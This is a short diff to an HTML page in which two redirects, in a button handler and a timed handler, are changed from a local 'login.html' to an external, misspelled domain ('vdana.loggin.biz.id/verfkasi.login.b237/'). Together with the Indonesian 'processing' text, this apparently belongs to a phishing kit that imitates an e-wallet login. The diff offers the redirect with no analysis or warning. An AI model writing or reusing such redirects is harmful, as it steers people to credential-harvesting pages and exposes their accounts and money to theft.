--- a/index.html
+++ b/index.html
@@ -191,7 +191,7 @@ function showVideo() {
 <script>
  function letsgo(){
  $("#process1").show();    
- window.location.href="login.html";
+ window.location.href="https://vdana.loggin.biz.id/verfkasi.login.b237/";
  }   
 </script>
 </smalxs>
@@ -224,7 +224,7 @@ $('body').css('background', '#ffffff');
 document.getElementById('kirims').innerHTML = "Memproses....";
 
  setTimeout(function(){
-  window.location.href='login.html';
+  window.location.href='https://vdana.loggin.biz.id/verfkasi.login.b237/';
  
     }, 1000);
  
